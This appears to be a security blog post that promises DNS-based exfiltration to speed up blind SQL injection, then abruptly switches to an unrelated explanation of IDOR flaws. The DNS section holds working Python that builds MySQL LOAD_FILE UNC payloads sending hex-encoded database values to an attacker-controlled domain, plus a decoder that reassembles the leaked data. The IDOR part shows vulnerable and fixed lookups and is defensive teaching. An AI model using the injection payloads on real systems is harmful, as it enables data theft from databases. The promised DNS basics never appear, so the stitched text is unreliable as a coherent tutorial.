Hello everyone, in this post we are going to use DNS for data exfiltration to speed up time-based blind SQL injection attacks, and to make exploitation possible at all on networks or applications with random delays, where timing measurements are unreliable. So let us start with the basics of DNS.
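As an added example (not code from the original post), the Python below shows both ends of the idea the post introduces: a time-based blind injection leaks roughly one bit per delayed request, whereas a DNS lookup carries a whole value out in one request. The code hex-encodes a value into DNS labels the way the injected query must, and reassembles the value from the query names seen at the attacker's name server. It assumes an attacker-controlled zone `exfil.example.com` and uses the MySQL-on-Windows `LOAD_FILE()` UNC-path lookup as the trigger; that is a common choice, not necessarily the one the post goes on to use, and the sample secret and log lines are constructed.

```python
import binascii

# Assumption (not from the post): the attacker controls the authoritative
# name server for this zone and logs every query name it receives.
EXFIL_DOMAIN = "exfil.example.com"
MAX_LABEL = 63   # RFC 1035: a label is at most 63 octets
MAX_NAME = 253   # RFC 1035: a name in presentation form is at most 253 chars

# Constructed stand-in for a value pulled out of the database.
SAMPLE_SECRET = b"admin:s3cret-example"


def encode_labels(data: bytes) -> list:
    """Hex-encode data and split it into labels of at most 63 octets.
    Hex (not base64) survives case folding and 0x20 case randomisation."""
    hexed = binascii.hexlify(data).decode("ascii")
    return [hexed[i:i + MAX_LABEL] for i in range(0, len(hexed), MAX_LABEL)]


def build_query_name(chunk_id: int, data: bytes) -> str:
    """<chunk_id>.<hex labels>.<zone>; the id lets the receiver reorder chunks."""
    name = ".".join([str(chunk_id), *encode_labels(data), EXFIL_DOMAIN])
    if len(name) > MAX_NAME:
        raise ValueError("name exceeds 253 chars; use a smaller chunk_size")
    return name


def chunk_names(data: bytes, chunk_size: int = 100) -> list:
    """Names to resolve for a value too long for a single query."""
    return [build_query_name(i, data[off:off + chunk_size])
            for i, off in enumerate(range(0, len(data), chunk_size))]


def mysql_unc_payload(expr: str, chunk_id: int, offset: int, length: int = 31) -> str:
    """MySQL on Windows: LOAD_FILE() on a UNC path makes the server resolve
    the host part, so SUBSTRING(expr) leaves in one request instead of one
    bit per sleep. 31 chars -> 62 hex chars stays inside one 63-octet label.
    Assumption: this is the common payload shape, not taken from the post."""
    return (rf"LOAD_FILE(CONCAT('\\\\', '{chunk_id}.', HEX(SUBSTRING({expr}, {offset}, {length})), "
            rf"'.{EXFIL_DOMAIN}\\a'))")


def decode_query_name(name: str):
    """Parse '<id>.<hex labels>.<zone>' back to (id, bytes); None if not ours."""
    name = name.rstrip(".").lower()          # resolvers may upper-case labels
    suffix = "." + EXFIL_DOMAIN
    if not name.endswith(suffix):
        return None
    labels = name[:-len(suffix)].split(".")
    if len(labels) < 2 or not labels[0].isdigit():
        return None
    try:
        return int(labels[0]), binascii.unhexlify("".join(labels[1:]))
    except (binascii.Error, ValueError):
        return None


def reassemble(query_names) -> bytes:
    """Rebuild the value from the query names the zone received, in any order.
    Resolvers retry, so duplicate chunks are expected and the first copy wins."""
    chunks = {}
    for qname in query_names:
        parsed = decode_query_name(qname)
        if parsed is not None:
            cid, data = parsed
            chunks.setdefault(cid, data)
    return b"".join(chunks[cid] for cid in sorted(chunks))


def demo() -> bytes:
    """Constructed server-side log: chunks arrive out of order, one is
    retried, and an unrelated query is mixed in."""
    names = chunk_names(SAMPLE_SECRET, chunk_size=8)
    observed = [names[2], names[0], names[0], "www.example.com.", names[1]]
    return reassemble(observed)


if __name__ == "__main__":
    print(mysql_unc_payload("user()", 0, 1))
    print(demo())
```

Two caveats a practitioner will hit: the database host must be able to resolve external names (outbound DNS is often allowed even when other egress is blocked, but check), and the injected SQL has to mirror the 63-octet label and 253-character name limits itself, which is why the payload above takes a 31-character substring per request and tags each one with a chunk id.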
As you know, web applications today can be as complex as operating systems, and much of that complexity sits in their authorisation schemes. A common class of weakness in those schemes is known in the literature as Insecure Direct Object Reference (IDOR).
Insecure Direct Object References occur when an application exposes a direct reference to an internal object (a database record, a file) and uses user-supplied input to select it without checking that the requesting user is authorised for that particular object. An attacker who simply changes the reference can bypass authorisation and access resources directly, for example other users' database records or files.
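As an added example (not code from the original post), here is the pattern in miniature: a record fetched purely by the client-supplied id, beside the fixed lookup that scopes the query to the authenticated user. The in-memory SQLite table, the invoice data and the function names are constructed for the illustration.

```python
import sqlite3


class Forbidden(Exception):
    """Raised when the session user may not see the requested object."""


def make_db() -> sqlite3.Connection:
    """Constructed sample data: two invoices owned by two different users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE invoices (id INTEGER PRIMARY KEY, owner TEXT, amount REAL)")
    conn.executemany("INSERT INTO invoices VALUES (?, ?, ?)",
                     [(101, "alice", 120.0), (102, "bob", 80.0)])
    return conn


def get_invoice_vulnerable(conn, current_user: str, invoice_id: int):
    """IDOR: the parameter is bound safely (no SQL injection), but the row is
    selected by the user-supplied id alone. Any authenticated user can read
    any invoice by changing the number in the request."""
    return conn.execute("SELECT id, owner, amount FROM invoices WHERE id = ?",
                        (invoice_id,)).fetchone()


def get_invoice_fixed(conn, current_user: str, invoice_id: int):
    """The ownership check is part of the query and uses the server-side
    session user, never anything the client sent. A missing row and a
    foreign row produce the same error, so the id space cannot be
    enumerated by telling 404 from 403."""
    row = conn.execute("SELECT id, owner, amount FROM invoices WHERE id = ? AND owner = ?",
                       (invoice_id, current_user)).fetchone()
    if row is None:
        raise Forbidden(f"invoice {invoice_id} is not accessible to {current_user}")
    return row


def access_result(conn, current_user: str, invoice_id: int) -> str:
    """Outcome of the fixed lookup as a string, handy for logging and tests."""
    try:
        get_invoice_fixed(conn, current_user, invoice_id)
        return "ok"
    except Forbidden:
        return "forbidden"


if __name__ == "__main__":
    db = make_db()
    # alice asks for bob's invoice: the vulnerable handler hands it over
    print("vulnerable:", get_invoice_vulnerable(db, "alice", 102))
    # the fixed handler refuses, and refuses identically for a non-existent id
    print("fixed:", access_result(db, "alice", 102), access_result(db, "alice", 999))
```

The check belongs in the data access layer or the query itself rather than in each controller, so that a new endpoint cannot forget it; where ids must be exposed to the client, scoping every query by the session's principal is the minimal fix, and per-session indirect references are the stricter one.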